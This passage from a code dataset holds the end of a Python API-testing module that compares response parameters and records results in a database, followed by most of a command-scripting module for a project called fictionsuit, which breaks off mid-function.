self.params_to_compare}\n                else:\n                    list_params_to_compare=eval(self.params_to_compare)  # convert the unicode-encoded data from the database table into a list\n                    if set(list_params_to_compare).issubset(set(temp_result_list_response)):  # set containment: the latter contains the former\n\n                        result = {'code': '0000', 'message': u'parameter completeness comparison passed', 'data': []}\n                        Operation_db.op_sql('UPDATE case_interface set params_actual=\"%s\",result_params_compare=%s where id=\"%s\"'\n                                            % (temp_result_list_response, 0, self.id_case))\n                    else:\n                        result = {'code': '3001', 'message': u'not all expected elements are present in the actual result', 'data': []}\n                        Operation_db.op_sql('UPDATE case_interface set params_actual=\"%s\",result_params_compare=%s where id=\"%s\"'\n                                            % (temp_result_list_response, 1, self.id_case))\n            else:\n                result = {'code': '2001', 'message': u'call to Get_compare_params returned an error', 'data':[]}\n                Operation_db.op_sql('UPDATE case_interface set result_params_compare=%s where id=\"%s\"'%(2,self.id_case))\n\n        except Exception as error:  # log to the log.txt file\n            result = {'code': '9999', 'message': u'parameter completeness exception', 'data': []}\n            Operation_db.op_sql('UPDATE case_interface set result_params_compare=%s where id=\"%s\"'%(9,self.id_case))\n\n\n            logging.basicConfig(filename=os.path.join(os.getcwd(), './syserror.Log'),\n                                level=logging.DEBUG,\n                                format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n            logger = logging.getLogger(__name__)\n            logger.exception(error)\n        return result\n\n    # recursive helper\n    def recur_params(self, result_interface):\n        # recursively collect the parameter names from the response into a list (deduplicated)\n        try:\n            if isinstance(result_interface, (str)) and json.loads(result_interface):  # the argument is a string that can be converted into a dict\n                temp_result_interface = json.loads(result_interface)\n                self.recur_params(temp_result_interface)\n            elif isinstance(result_interface, dict):  # the argument is a dict\n                for param, value in result_interface.items():\n                    self.result_list_response.append(param)\n                    if isinstance(value, list):\n                        for param in value:\n                            self.recur_params(param)\n                    elif isinstance(value, dict):\n                        self.recur_params(value)\n                    else:\n                        continue\n            else:\n                pass\n        except Exception as error:  # log to the log.txt file\n            logging.basicConfig(filename=os.path.join(os.getcwd(), '../log/syserror.log'), level=logging.DEBUG,\n                                format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n            logger = logging.getLogger(__name__)\n            logger.exception(error)\n            return {'code': '9999', 'message': u'data processing exception', 'data': []}\n        return {'code': '0000', 'message': u'success', 'data': list(set(self.result_list_response))}\n\n\n\n\n\n# new: write the message and code of a failed response to sql\n    def Write_to_messageandcode(self,result_interface):\n        '''\n        :param result_interface: HTTP response body\n        :return: return code, message and data\n        '''\n        try:\n            if json.loads(result_interface):\n                temp_result_interface = json.loads(result_interface)  # convert the string into a dict\n\n                if temp_result_interface.__contains__('state'):\n                    temp_result_state=str(temp_result_interface['state'])  # get the value of response state\n\n                    # dict.__contains__(key) returns true if the key is in the dict, otherwise false.\n                    if temp_result_state!='1':\n                        if temp_result_state!='True':\n                            if temp_result_interface.__contains__('message') and temp_result_interface.__contains__('code'):\n                                temp_result_message=temp_result_interface['message']  # get the value of response message\n                                temp_result_code=temp_result_interface['code']\n\n                                result = {'code': '0000', 'message': u'response contains message and code, ready to write to sql', 'data': []}\n\n                                Operation_db.op_sql('UPDATE case_interface set result_message=\"%s\",result_code=\"%s\" where id=\"%s\"'\n                                                    % (temp_result_message,temp_result_code , self.id_case))\n                            else:\n                                result = {'code': '1001', 'message': u'response does not contain message,code', 'data': []}\n\n                        else:\n                            result = {'code': '1002', 'message': u'state=True, request error', 'data': []}\n                    else:\n                        result = {'code': '1003', 'message': u'state=1, request error', 'data': []}\n\n                else:\n                    result = {'code': '1004', 'message': u'response does not contain state', 'data': []}\n            else:\n                result = {'code': '1005', 'message': u'response format is invalid', 'data': []}\n\n        except Exception as error:  # log to the log.txt file\n            result = {'code': '9999', 'message': u'key parameter comparison exception', 'data': []}\n\n            logging.basicConfig(filename=os.path.join(os.getcwd(), './syserror.Log'),\n                                level=logging.DEBUG,\n                                format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n            logger = logging.getLogger(__name__)\n            logger.exception(error)\n        return result\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n    # test\n    # result_interface = '{\"message\": \"获取附近服务商成功\", \"nextPage\": 1, \"pageNo\": 0, ' \\\n    #                    '\"merchantInfos\": \"测试环境店铺\", \"resultCode\": \"000\", \"totalPage\": 66746}'\n\n    result_interface='{\"code\": 42204012, \"message\": \"您不是管理员,无权操作\", \"state\": 0}'\n\n    params_interface={'table_name': 'test', 'update_time': '2017-8-21 00:52:44', 'result_interface': '',\n                      'result_code_compare': 0, 'exe_mode': 'post', 'code_to_compare': 'resultCode',\n                      'params_actual': None, 'case_status': 0,\n                      'params_interface': '{\"latitude\": \"NULL\", \"pageNo\": 0, \"longitude\": \"123.154212\"}',\n                      'result_params_compare': None, 'code_expect': '000', 'code_actual': '',\n                      'create_time': None, 'exe_level': 0,\n                      'url_interface': 'http://192.168.1.88:8080/personalOrder/getNearbyServiceMerchantList',\n                      'header_interface': '{\"Content-Length\": \" 0\", \"UUID\": \" 862096032360278\", '\n                                          '\"POSTFIX\": \" 9BCE6A51E0DDE0D759A55D199E691919CF3E492C9B77EA3985D6C2291B71A6274ABD93FA91EF65AC9660EC51C4D97DA1\", '\n                                          '\"SYSTEM\": \" 5.1\", \"Host\": \" 192.168.1.88\", \"VERSION\": \" 2.6.1.161221\", '\n                                          '\"User-Agent\": \" Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1\", '\n                                          '\"PHONE\": \" \", \"Connection\": \" Keep-Alive\", '\n                                          '\"CLIENT_TYPE\": \" 1\", \"APIVERSION\": \" 1.0\", \"TIME\": \" 1483597250589\", '\n                                          '\"MODEL\": \" iPhone 5S\", \"CLIENT_FLAG\": \" 1\", \"CHANNEL\": \" Default\", '\n                                          '\"Accept-Encoding\": \" gzip, deflate\"}', 'id': 1,\n                      'params_to_compare': \"['state','message','data']\"}\n    test_compare_param=Compare_param(params_interface)\n    # result_compare_code=test_compare_param.Compare_code(result_interface)  # key parameter value comparison\n    # print(result_compare_code)\n    #result_get_compare_params=test_compare_param.Get_compare_params(result_interface)  # get the parameter set\n    #print(result_get_compare_params)\n    # result_compare_params_complete=test_compare_param.Compare_params_complete(result_interface)  # parameter completeness comparison\n    # print(result_compare_params_complete)\n    result_get_compare_params = test_compare_param.Write_to_messageandcode(result_interface)  # write the error info to sql\n    print(result_get_compare_params)\n\n\n\n\n\n\n\n\n","repo_name":"jjwv/Auto_api","sub_path":"Auto_Api/Common/Compare_param.py","file_name":"Compare_param.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4548140401","text":"from __future__ import annotations\n\nimport gc\nimport glob\nimport ntpath\nimport os\nimport re\nimport traceback\n\nfrom .failure import CommandFailure\n\nfrom ..api_wrap.openai import ChatFactory, ChatInstance\nfrom ..core.fictionscript import (\n    ExpressionMessage,\n    FictionScript,\n    Scope,\n    ScriptLineMessage,\n)\nfrom ..core.user_message import UserMessage\nfrom .command_group import (\n    CommandGroup,\n    CommandHandled,\n    command_split,\n    slow_command,\n)\n\nCOMMA_ESCAPE = \"``COM\"\nCOMMA_ESCAPE_B = \"```COM\"\n\n\n# This file is doing way too many things\n\n\ndef escape_commas(command):\n    command.escape_commas = True\n    return command\n\n\ndef no_preprocessing_after(sequence: str, unless: str = None):\n    def decorator(command):\n        command.no_preprocessing_after = sequence\n        command.unless = unless\n        return command\n\n    return decorator\n\n\ndef lsnap(string: str, delimiter: str):\n    split = string.split(delimiter, maxsplit=1)\n    if len(split) < 2:\n        return (string, \"\")\n    return (split[0].rstrip(), split[1].lstrip())\n\n\ndef rsnap(string: str, delimiter: str):\n    split = string.rsplit(delimiter, maxsplit=1)\n    if len(split) < 2:\n        return (\"\", string)\n    return (split[0].rstrip(), split[1].lstrip())\n\n\nclass Scripting(CommandGroup):\n    def __init__(self, command_groups: list[CommandGroup]):\n        self.command_groups = command_groups + [self]\n        self.base = Scope()  # TODO: save and load scopes?\n        self.vars = self.base\n        # TODO: Concurrency & scopes might be a mess\n        # TODO: add a more general preprocessor outside of Scripting for parsing scripts\n        # from a nicer syntax down into runnable commands\n        # TODO: maybe add config options for folders instead of just hard-coding things...\n        self.vars[\"fic\"] = Scope(name=\"fic\", parent=self.vars)\n        self.load_scripts(\"fictionsuit/fic\", self.vars[\"fic\"])\n        self.load_scripts(\"fictionsuit/.fic\", self.vars[\"fic\"])\n        self.vars[\"fic\"][\"chat\"] = ChatFactory()\n\n        self.evaluators = {}\n        self.escape_commas = []\n\n        for group in self.command_groups:\n            cmds = group.get_commands()\n            for cmd in cmds:\n                if hasattr(cmds[cmd], \"no_preprocessing_after\"):\n                    self.evaluators[cmd] = (\n                        
cmds[cmd].no_preprocessing_after,\n cmds[cmd].unless,\n )\n if hasattr(cmds[cmd], \"escape_commas\"):\n self.escape_commas.append(cmd)\n\n async def intercept_content(self, content: str) -> str | CommandFailure:\n # print(f\"Begin Interception: [{content}]\")\n # print(self.vars.inspect())\n\n (cmd, args) = command_split(content)\n\n if cmd is None:\n return content\n\n if cmd[0] == \"#\":\n return \"\" # Comment\n\n def handle_omnibar(content: str, cmd: str, args: str) -> str:\n # print(f\"Handle Omnibar: [{content}]\")\n # print(f\"cmd: [{cmd}]\")\n # print(f\"args: [{args}]\")\n n = 1\n if cmd is None:\n return content\n if cmd[0] not in \"|?\":\n return content\n if \"=\" in content:\n if \">\" not in content[: content.index(\"=\")]:\n expansion = \"var\"\n else:\n expansion = \"insert\"\n else:\n content = content.strip()\n if content == f\"|\":\n expansion = \"where\"\n elif content == f\"?\":\n expansion = \"inspect where\"\n elif content == f\"??\":\n n = 2\n expansion = \"dump where\"\n else:\n if content.endswith(\"??\"):\n expansion = \"dump retrieve\"\n cmd = cmd[1:] + args\n cmd = cmd[:-2].rstrip()\n args = \"\"\n n = 0\n elif content.endswith(\"?\"):\n expansion = \"inspect retrieve\"\n cmd = cmd[1:] + args\n cmd = cmd[:-1].rstrip()\n args = \"\"\n n = 0\n else:\n expansion = \"retrieve\"\n x = \" \".join([expansion, cmd[n:], args])\n # print(f\"Omnibar expansion: [{x}]\")\n return x\n\n content = handle_omnibar(content, cmd, args)\n\n (cmd, args) = command_split(content)\n\n unchanged = \"\"\n\n if cmd == \"...\":\n content = f\"silently {content[3:]}\"\n\n if cmd in self.evaluators:\n after = self.evaluators[cmd][0]\n unless = self.evaluators[cmd][1]\n if after == \"\":\n split = [\"\", content]\n else:\n split = None\n try:\n unless_index = content.index(unless)\n except:\n unless_index = -1\n if unless_index != -1:\n try:\n after_index = content.index(after)\n except:\n after_index = -1\n if unless_index < after_index:\n split = [content]\n if split is None:\n split = content.split(after, maxsplit=1)\n if len(split) > 1:\n unchanged = f\"{after} {split[1].lstrip()}\".lstrip()\n content = split[0].rstrip()\n\n content = content.replace(\"\\\\n\", \"\\n\")\n\n if cmd in self.escape_commas:\n content = content.replace(\"\\\\,\", COMMA_ESCAPE)\n content = content.replace(\",\", COMMA_ESCAPE_B)\n try:\n content = content.format(**self.vars.get_vars())\n except KeyError as k:\n return CommandFailure(f\"No such variable: {k}\")\n if cmd in self.escape_commas:\n content = content.replace(\",\", COMMA_ESCAPE)\n content = content.replace(COMMA_ESCAPE_B, \",\")\n\n content = f\"{content} {unchanged}\".strip()\n\n # print(f\"End Interception: [{content}]\")\n return content\n\n def load_scripts(self, directory_name, scope: Scope):\n for file in glob.glob(os.path.join(directory_name, \"*.fic\")):\n var_name = ntpath.basename(file)\n script = FictionScript.from_file(file, var_name)\n if var_name.endswith(\".fic\"):\n var_name = var_name[:-4].replace(\"_\", \" \").lower()\n scope[var_name] = script\n\n @slow_command\n async def cmd__preprocess(self, message: UserMessage, args: str) -> str:\n \"\"\"Internal metacommand for debugging.\n Usage:\n `preprocess {text}` runs pre-processing to fill in variables and escape certain characters\n \"\"\"\n return await self.intercept_content(args)\n\n async def cmd_drop(self, message: UserMessage, args: str):\n \"\"\"Drop a variable from the current scope.\"\"\"\n try:\n del self.vars.vars[args]\n except KeyError:\n return CommandFailure(f\"No such 
variable: {args}\")\n\n @no_preprocessing_after(\":\")\n @slow_command\n async def cmd_for(self, message: UserMessage, args: str):\n \"\"\"Iterate over a scope's contents.\n Usage:\n `for {variable} : {scope} \\n {command}`\n \"\"\"\n (loop_variable, args) = lsnap(args, \":\")\n if loop_variable == \"\" or args == \"\":\n return CommandFailure(\"Usage: `for {variable} : {scope} \\n {command}`\")\n (source_scope, command) = lsnap(args, \"\\n\")\n if source_scope == \"\" or command == \"\":\n return CommandFailure(\"Usage: `for {variable} : {scope} \\n {command}`\")\n\n source_scope = await self._evaluate(\n message, source_scope, \"for loop source scope\"\n )\n\n if isinstance(source_scope, CommandFailure):\n return CommandFailure(\n f\"Failed evaluating source_scope of for loop.\\n{source_scope}\"\n )\n\n if not isinstance(source_scope, Scope):\n return CommandFailure(f\"Expected a scope, got `{source_scope}`\")\n\n execution_scope = Scope(\n parent=source_scope, name=f\"for {loop_variable} execution context\"\n )\n execution_scope[\"results\"] = Scope(\n parent=execution_scope, name=f\"for {loop_variable}\"\n )\n\n script = None\n if \"\\n\" in command:\n script = FictionScript(command.split(\"\\n\"), name=\"_temp_for\")\n\n for variable_name in source_scope.vars:\n execution_scope[loop_variable] = source_scope[variable_name]\n execution_scope[\"name\"] = variable_name\n if script is None:\n result = await self._evaluate(\n message, command, \"for loop command\", execution_scope\n )\n else:\n result = await self._fic(message, \"\", script, execution_scope)\n if isinstance(result, CommandFailure):\n return CommandFailure(f\"Failed evaluating for loop command.\\n{result}\")\n\n return execution_scope[\"results\"]\n\n async def cmd_where(self, message: UserMessage, args: str) -> str:\n \"\"\"Internal metacommand for debugging.\n Returns the name of the current scope.\n Usage:\n `|`\"\"\"\n return self.vars\n\n async def cmd_scope(self, message: UserMessage, args: str) -> Scope:\n if args != \"\":\n self.vars[args] = Scope(parent=self.vars, name=args)\n return\n return Scope(parent=self.vars)\n\n async def cmd_into(self, message: UserMessage, args: str) -> Scope:\n \"\"\"Enters a scope.\n Usage:\n `into {scope}`\"\"\"\n vars = self.vars.get_vars()\n if args not in self.vars:\n return CommandFailure(f\"No such variable: `{args}`\")\n target = vars[args]\n if not isinstance(target, Scope):\n return CommandFailure(f\"Variable `{args}` is not a scope.\")\n self.vars = target\n\n async def cmd_out(self, message: UserMessage, args: str) -> None | CommandFailure:\n \"\"\"Exits the current scope, moving to its parent scope.\n Usage:\n `out`\"\"\"\n if self.vars.parent is None:\n return CommandFailure(\"Cannot exit scope, as there is no parent scope.\")\n self._return_to_scope(self.vars.parent)\n\n async def cmd_base(self, message: UserMessage, args: str) -> None:\n \"\"\"Returns to the base scope.\n Usage:\n `base`\"\"\"\n self._return_to_scope(self.base)\n\n async def cmd_outer(self, message: UserMessage, args: str):\n \"\"\"Returns the value of a variable from the parent scope.\"\"\"\n if args == \"\":\n if self.vars.parent is None:\n return CommandFailure(\n \"There is no outer scope -- this is the base scope.\"\n )\n return self.vars.parent\n return self.vars.parent[args]\n\n @no_preprocessing_after(\"\")\n async def cmd_inspect(self, message: UserMessage, args: str):\n result = await self._evaluate(message, args, \"inspection\")\n if hasattr(result, \"sm_inspect\"):\n try:\n return await 
result.sm_inspect(\"\")\n except Exception as ex:\n return CommandFailure(\n f\"Inspection failed: {ex}\\n{traceback.format_exc()}\"\n )\n if isinstance(result, str):\n return f'str(\"{result}\")'\n return CommandFailure(f\"Cannot inspect {result}\")\n\n @no_preprocessing_after(\"\")\n async def cmd_dump(self, message: UserMessage, args: str):\n result = await self._evaluate(message, args, \"dump\")\n if hasattr(result, \"sm_dump\"):\n try:\n return await result.sm_dump(\"\")\n except Exception as ex:\n return CommandFailure(f\"Dump failed: {ex}\\n{traceback.format_exc()}\")\n if isinstance(result, str):\n return f'str(\"{result}\")'\n return CommandFailure(f\"Cannot dump {result}\")\n\n thenfinder = re.compile(\"\\s+then\\s+\")\n elsefinder = re.compile(\"\\s+else\\s+\")\n\n @no_preprocessing_after(\"\")\n @slow_command\n async def cmd_if(self, message: UserMessage, args: str):\n \"\"\"if {condition} then {y} (optional:) else {z}\"\"\"\n cond_then_split = [\n x.strip() for x in Scripting.thenfinder.split(args, maxsplit=1)\n ]\n if len(cond_then_split) < 2:\n return CommandFailure(\"An `if` needs a `then`.\")\n cond = cond_then_split[0]\n then_else_split = [\n x.strip()\n for x in Scripting.elsefinder.split(cond_then_split[1], maxsplit=1)\n ]\n then = then_else_split[0]\n if len(then_else_split) < 2:\n _else = None\n else:\n _else = then_else_split[1]\n\n cond_result = await self._evaluate(message, cond, \"if condition\")\n\n if isinstance(cond_result, CommandFailure):\n return CommandFailure(f\"Failed while evaluating condition:\\n{cond_result}\")\n\n if not isinstance(cond_result, bool):\n return CommandFailure(\n f\"If condition should be a bool, but was `{cond_result}`.\"\n )\n\n if cond_result:\n block = then\n clause = \"then\"\n elif _else is not None:\n block = _else\n clause = \"else\"\n else:\n return\n\n script = None\n if \"\\n\" in block:\n script = FictionScript(block.split(\"\\n\"), name=f\"_temp_if_{clause}\")\n\n scope = Scope(parent=self.vars, name=f\"_temp_if_{clause}\")\n\n if script is not None:\n return await self._fic(message, \"\", script, scope)\n else:\n return await self._evaluate(message, block, f\"{clause} clause\", scope)\n\n @no_preprocessing_after(\"\")\n @slow_command\n async def cmd_while(self, message: UserMessage, args: str):\n \"\"\"while {condition} \\n {body}\"\"\"\n cond_do_split = [x.strip() for x in args.split(\"\\n\", maxsplit=1)]\n if len(cond_do_split) < 2:\n return CommandFailure(\"A while loop needs a body.\")\n cond = cond_do_split[0]\n body = cond_do_split[1]\n\n while True:\n cond_result = await self._evaluate(message, cond, \"while condition\")\n\n if isinstance(cond_result, CommandFailure):\n return CommandFailure(\n f\"Failed while evaluating condition:\\n{cond_result}\"\n )\n\n if not isinstance(cond_result, bool):\n return CommandFailure(\n f\"While condition should be a bool, but was `{cond_result}`.\"\n )\n\n if not cond_result:\n return\n\n result = await self._evaluate(message, body, \"body of while loop\")\n if isinstance(result, CommandFailure):\n return CommandFailure(f\"Failed in body of while loop:\\n{result}\")\n\n async def cmd_fail(self, message: UserMessage, args: str):\n if args == \"\":\n args = \"No explanation.\"\n return CommandFailure(args)\n\n @no_preprocessing_after(\"\")\n async def cmd_silently(self, message: UserMessage, args: str):\n \"\"\"Attempt to evaluate a command. 
Returns nothing, even if the command fails.\"\"\"\n await self._evaluate(message, args, \"silenced evaluation\")\n\n async def cmd_retrieve(self, message: UserMessage, args: str):\n \"\"\"Retrieve a value from within a scope, or from scopes within scopes.\n You can just write | as a stand-in for this command.\"\"\"\n index = None\n index_split = [x.strip() for x in args.split(\"@\", maxsplit=1)]\n if len(index_split) == 2:\n try:\n index = int(index_split[0])\n args = index_split[1]\n except ValueError:\n pass # Not an index.\n\n scope = self.vars\n while len(args) > 0 and args[0] == \"|\" and scope.parent is not None:\n args = args[1:].lstrip()\n scope = scope.parent\n\n split = [x.strip() for x in args.split(\">\") if x != \"\"]\n\n result = scope\n for name in split:\n if name in result:\n result = result[name]\n else:\n return CommandFailure(f'\"{name}\" not found.')\n\n if index is not None:\n try:\n return result[index]\n except TypeError as err:\n return CommandFailure(f'Cannot index into \"{result}\":\\n{err}')\n except IndexError as err:\n return CommandFailure(f\"Failed to access index {index}:\\n{err}\")\n\n return result\n\n @no_preprocessing_after(\"\")\n async def cmd_not(self, message: UserMessage, args: str):\n \"\"\"Evaluate an expression, and return its negation.\n Returns a CommandFailure if the expression does not return a boolean.\"\"\"\n result = await self._evaluate(message, args, \"negation\")\n if isinstance(result, CommandFailure):\n return CommandFailure(f\"Failed while evaluating expression:\\n{result}\")\n if not isinstance(result, bool):\n return CommandFailure(\n f'Cannot negate \"{result}\", because it is not a boolean.'\n )\n return not result\n\n @no_preprocessing_after(\"=\", unless=\":=\")\n async def cmd_insert(self, message: UserMessage, args: str):\n \"\"\"Assign a value from within a scope, or from scopes within scopes.\n You can just write | as a stand-in for this command.\"\"\"\n echo = False\n if \":=\" in args:\n split = [x.strip() for x in args.split(\":=\", maxsplit=1)]\n echo = True\n else:\n split = [x.strip() for x in args.split(\"=\", maxsplit=1)]\n\n retrieval = split[0]\n if len(split) < 2:\n return CommandFailure(\"No expression to insert.\")\n insertion = split[1]\n\n scope = self.vars\n while len(retrieval) > 0 and retrieval[0] == \"|\" and scope.parent is not None:\n retrieval = retrieval[1:].lstrip()\n scope = scope.parent\n\n retrieval_split = [x.strip() for x in retrieval.split(\">\")]\n if len(retrieval_split) == 1:\n if retrieval_split[0] == \"\":\n return CommandFailure(\"No insert destination.\")\n\n for name in retrieval_split[:-1]:\n if name in scope:\n scope = scope[name]\n else:\n return CommandFailure(f'\"{name}\" not found.')\n\n original_scope = self.vars\n self.vars = scope\n try:\n if echo:\n result = await self.cmd_var(\n message, f\"{retrieval_split[-1]} := {insertion}\"\n )\n else:\n result = await self.cmd_var(\n message, f\"{retrieval_split[-1]} = {insertion}\"\n )\n return result\n finally:\n self._return_to_scope(original_scope)\n\n def _return_to_scope(self, scope: Scope) -> None:\n self.vars = scope\n # gc.collect()\n\n @no_preprocessing_after(\"\")\n async def cmd_fails(self, message: UserMessage, args: str):\n result = await self._evaluate(message, args, \"failure check\")\n return isinstance(result, CommandFailure)\n\n @no_preprocessing_after(\"=\", unless=\":=\")\n @slow_command\n async def cmd_arg(self, message: UserMessage, args: str) -> None | CommandFailure:\n \"\"\"Returns a failure if the variable 
has not been defined.\n Alternatively, you can provide a default value.\n Arguments with no default values cannot follow an argument with a default value.\n Does nothing otherwise.\n If used within a ficscript document, this defines a required input for the script.\n Usage:\n `arg {name of argument}`\n `arg {name of argument} = {default value}`\"\"\"\n defaulting = \"=\" in args\n if defaulting:\n self.vars._has_defaulting_args = True\n if not defaulting and self.vars._has_defaulting_args:\n return CommandFailure(\n \"Arguments without defaults must precede arguments with defaults.\"\n )\n if args.startswith(\":\"):\n args = args[1:]\n echo = \":=\" in args\n if echo:\n arg_name = args.split(\":=\", maxsplit=1)[0].strip()\n else:\n arg_name = args.split(\"=\", maxsplit=1)[0].strip()\n if arg_name not in self.vars:\n if not defaulting:\n return CommandFailure(f\"Missing argument: {arg_name}\")\n return await self.cmd_var(message, args)\n\n async def cmd_args(self, message: UserMessage, args: str) -> None | CommandFailure:\n \"\"\"Returns a failure if any of the arguments have not been defined.\n Does nothing otherwise.\n This is typically used at the start of a script file, to ensure that every script input is defined.\n Names of arguments cannot contain commas, since commas are the separator.\n Usage:\n `args {name of argument}, {name of another argument}, {and another}, {and so on any number of times...} ...`\n \"\"\"\n if self.vars._has_defaulting_args:\n return CommandFailure(\n \"Arguments without defaults must precede arguments with defaults.\"\n )\n args_split = [arg.strip() for arg in args.split(\",\")]\n for arg in args_split:\n if arg.startswith(\":\"):\n arg = arg[1:]\n if arg not in self.vars:\n return CommandFailure(f\"Missing argument: {args}\")\n\n @slow_command\n async def cmd_load_fic(self, message: UserMessage, args: str) -> str:\n \"\"\"Load a fictionscript from a file. Files typically use the .fic extension. When this is the case, the\n name of the variable referring to the script will be the filename before the .fic extension, with\n underscores replaced by spaces, in all lower case.\n Usage:\n `load_fic fic/compose_poem.fic` by default, this will load the script as \"compose poem\"\n `load_fic fic/query.fic as {custom name}`\"\"\"\n if \"$FIC\" in args:\n used_shorthand = True\n args = args.replace(\"$FIC\", \"./fictionsuit/fic\")\n if \"$.FIC\" in args:\n used_shorthand = True\n args = args.replace(\"$.FIC\", \"./fictionsuit/.fic\")\n\n split = [x.strip() for x in args.split(\" as \", maxsplit=1)]\n if len(split) == 1:\n var_name = ntpath.basename(args)\n if var_name.endswith(\".fic\"):\n var_name = var_name[:-4].replace(\"_\", \" \").lower()\n else:\n var_name = split[1]\n\n try:\n script = FictionScript.from_file(split[0], var_name)\n except FileNotFoundError:\n if used_shorthand:\n return CommandFailure(\n f\"File `{split[0]}` not found. Maybe you mixed up `$FIC` and `$.FIC`?\"\n )\n return CommandFailure(f\"File `{split[0]}` not found.\")\n\n self.vars[var_name] = script\n\n return var_name\n\n @no_preprocessing_after(\"\\n\")\n @slow_command\n async def cmd_def_fic(self, message: UserMessage, args: str) -> str:\n \"\"\"Define a fictionscript. 
You should probably look at some examples in the `fic/` folder, and\n familiarize yourself with the documentation of the commands from the `Scripting` command group.\n Usage:\n `def_fic {name}\\\\n{script}`\"\"\"\n split = [x.strip() for x in args.split(\"\\n\")]\n var_name = split[0]\n if len(split) < 2:\n return CommandFailure(\"Script definition is empty.\")\n return FictionScript(split[1:], name=var_name)\n\n async def _fic(\n self,\n message: UserMessage,\n args: str,\n script: FictionScript,\n scope: Scope | None = None,\n ) -> CommandFailure:\n \"\"\"See docs for cmd_fic\"\"\"\n split = args.split(\":\", maxsplit=1)\n if len(split) > 1:\n arg_values = [\n x.strip().replace(COMMA_ESCAPE, \",\") for x in split[1].split(\",\")\n ]\n arg_values = [x for x in arg_values if x != \"\"]\n else:\n arg_values = []\n params = script.args\n script_name = script.name\n\n previous_dis_int_value = message.disable_interactions\n message.disable_interactions = True\n\n initial_scope = self.vars\n if scope is not None:\n self.vars = scope\n else:\n self.vars = Scope(name=f\"{script.name} execution\", parent=self.vars)\n\n async def enqueue(script_message):\n return await self.system.enqueue_message(\n script_message, return_failures=True, return_returns=True\n )\n\n if len(arg_values) > len(params):\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return CommandFailure(\n f\"Too many arguments! Remember to escape your commas.\\n\\nExtra arguments:\\n{arg_values[len(params):]}\"\n )\n\n for i in range(len(arg_values)):\n echo = False\n arg_value = arg_values[i]\n param = params[i]\n if param.startswith(\":\"):\n param = param[1:]\n echo = True\n if arg_value.startswith(\":\"):\n arg_value = arg_value[1:]\n echo = True\n assignment_op = \":=\" if echo else \"=\"\n result = await enqueue(\n ScriptLineMessage(\n f\"var {param} {assignment_op} {arg_value}\", script_name, message\n )\n )\n if result is not None:\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return CommandFailure(f\"Failed to set argument:\\n{result}\")\n\n message_lines = []\n collecting = False\n for index, line in enumerate(script.lines):\n line = line.rstrip()\n if line == \"\":\n continue\n if line.startswith(\"#\"):\n # print(f\"{index+1: >3} {line[1:].lstrip()}\")\n continue\n if line.endswith(\"--\"):\n if not collecting:\n if line[-3] == \"-\":\n message_lines.append(line[:-3].rstrip())\n collecting = True\n continue\n message_lines.append(line[:-2].rstrip())\n continue\n line = line[:-2].rstrip()\n collecting = False\n else:\n if collecting:\n message_lines.append(line)\n continue\n message_lines.append(line)\n message = ScriptLineMessage(\"\\n\".join(message_lines), script_name, message)\n result = await enqueue(message)\n message_lines = []\n if isinstance(result, CommandFailure):\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return CommandFailure(\n f\"Script `{script_name}` failed at line {index + 1}:\\n{result}\"\n )\n if result is not None:\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return result\n\n self._return_to_scope(initial_scope)\n\n message.disable_interactions = previous_dis_int_value\n\n @escape_commas\n @slow_command\n async def cmd_fic(self, message: UserMessage, args: str) -> CommandFailure:\n \"\"\"Run a fictionscript. 
Scripts must first be loaded from a file with `load_fic` or defined with `def_fic`.\n If the script has only one returned variable, this command will return its value.\n Usage:\n `fic {name of script}`\"\"\"\n scope_before = self.vars\n disabled_before = message.disable_interactions\n try:\n split = args.split(\":\", maxsplit=1)\n script_name = split[0].strip()\n if len(split) > 1:\n arg_values = [\n x.strip().replace(COMMA_ESCAPE, \",\") for x in split[1].split(\",\")\n ]\n arg_values = [x for x in arg_values if x != \"\"]\n else:\n arg_values = []\n\n if script_name in self.vars:\n script = self.vars[script_name]\n elif script_name in self.vars[\"fic\"]:\n script = self.vars[\"fic\"][script_name]\n elif os.path.exists(script_name):\n script_name = await self.cmd_load_fic(message, script_name)\n script = self.vars[script_name]\n else:\n if \":\" not in args:\n return CommandFailure(\n \"No such script.\\nMaybe you forgot to put a colon (:) after the script name?\"\n )\n return CommandFailure(\"No such script.\")\n\n if not isinstance(script, FictionScript):\n return CommandFailure(f\"{script_name} is not a script.\")\n return await self._fic(message, args, script)\n finally:\n self._return_to_scope(scope_before)\n message.disable_interactions = disabled_before\n\n async def cmd_pack(self, message: UserMessage, args: str):\n \"\"\"Pack several variables into a scope, and return it.\"\"\"\n vars = [x.strip() for x in args.split(\",\")]\n scope = Scope(parent=self.vars, name=\"pack\")\n\n for var in vars:\n if var in self.vars:\n scope[var] = self.vars[var]\n if isinstance(scope[var], Scope):\n scope[var].parent = scope\n else:\n return CommandFailure(f'No variable \"{var}\" in scope.')\n return scope\n\n @no_preprocessing_after(\"\")\n async def cmd_return(self, message: UserMessage, args: str):\n \"\"\"Evaluate and return an expression.\"\"\"\n return await self._evaluate(message, args, \"return\")\n\n async def _evaluate(\n self,\n message: UserMessage,\n expression: str,\n context: str,\n scope: Scope | None = None,\n ):\n previous_dis_int_value = message.disable_interactions\n message.disable_interactions = True\n initial_scope = self.vars\n if scope is not None:\n self.vars = scope\n expression_message = ExpressionMessage(expression, context, message)\n result = await self.system.enqueue_message(\n expression_message, return_whatever=True\n )\n message.disable_interactions = previous_dis_int_value\n self._return_to_scope(initial_scope)\n return result\n\n @no_preprocessing_after(\"=\", unless=\":=\")\n @slow_command\n async def cmd_var(self, message: UserMessage, args: str):\n \"\"\"Attempts to store the result of another command as a variable.\n Usage:\n `var {name of variable} = {command and its arguments}`\"\"\"\n\n echo = \":=\" in args\n if echo:\n arg_split = [x.strip() for x in args.split(\":=\", 